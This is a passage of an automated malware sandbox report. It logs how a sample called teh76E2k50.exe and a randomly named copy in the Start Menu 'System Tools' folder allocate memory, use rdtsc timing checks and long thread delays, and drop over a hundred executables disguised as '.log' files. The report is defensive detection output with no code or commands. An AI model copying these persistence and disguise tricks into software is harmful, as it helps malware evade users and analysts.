                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1B120000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 11E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1AD10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: CF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1A6B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 2B30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1ABC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 16D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1B280000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 17A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1B3E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: D20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1A880000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Code function: 0_2_00007FF848C031F2 rdtsc 0_2_00007FF848C031F2
Source: C:\Users\user\Desktop\teh76E2k50.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LGJlUtwq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\rkdyzPpO.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\SmnyDbFc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LOtDzcWv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\TnccMNji.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\mQxGLdSr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\UkEZnNMm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\qDXyTobI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\nNYOgdhm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YsCiJgGh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\OnPkEyEo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\KszcatAz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\fQyImqSF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ASPeVAWX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\dKlIuyLO.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\WKjpqzTc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\IgGVBfqZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\nYXzmwFp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LEvStJys.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VOpRirdG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NEWCTUxq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VDLborKV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\CYcTTrrX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\UmOidmEa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YwaKaovT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\fUOHmcKi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\sgXWGXfk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eWPiaGig.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jFHPguuZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\oZZOlFlp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WLQZDrsB.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\DAfcAdjS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WgxIpVoy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\lzFWljSG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\vpCPqhyF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\KMbLIKLR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\hMsguyJb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\qHVggSrJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\IQXUcfJd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WiesDNNX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\MmOLMqmx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\otZOJrJN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\baJGltgV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\IzyaiCCJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JapvNPbx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\EzoTkVXm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZaghFjTO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\dQWYMfTH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eTYoXqRT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eeFyxBcE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\HPmLzFXY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\AefMODTq.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\DswJWuJN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FxxLTNKF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\hssgXLlC.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\xxZNeyLt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eHNQPyaJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\pwZqNBtQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jGqnAmhH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\zaBVcLCP.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\GrWSIakL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\yHtdVhrW.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\xATktOEY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NQgmULbr.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\SlzRxYMl.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\zmLFdDgP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\HgsdOaRa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\pvrGzKVr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\BpxnzmkL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\vrvmFyrk.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\kGyWBgAx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\SWHRKmQg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\kDcZKjpC.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FFhdxwlL.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\MjzskGoA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YjjrLEtu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\DXOleQyG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\GGiDqFDB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\EVCmjrsI.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\MbPZGXOu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\HJAvhXOf.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\AQotzTRR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YuMryEyW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JvdSwEFX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\AVHMeQAt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NImBSGpT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\naQWCNyV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\iKNqYmED.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\DDuvcNgQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\luCemuwv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\rGeXPKfd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JQrKHwDu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\GOTKaosQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VZbjtNtA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZpcBYfHT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\aZMqfwUo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\sKHPBBwF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\fPQYZyug.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\sFKgoXgD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FUptAQNB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\toafQXzH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LNSSdwSp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\yERXsZaS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FFnbpIFd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ccSQbSYJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VlDkhNyc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\zYgEJQlz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\hAixtGfa.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\LESjjfMz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\CYbeNrdN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\OLsbOcto.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jLOQRvWt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WlXaMeru.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\CUHLiuul.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\BSjUAQPo.logJump to dropped file
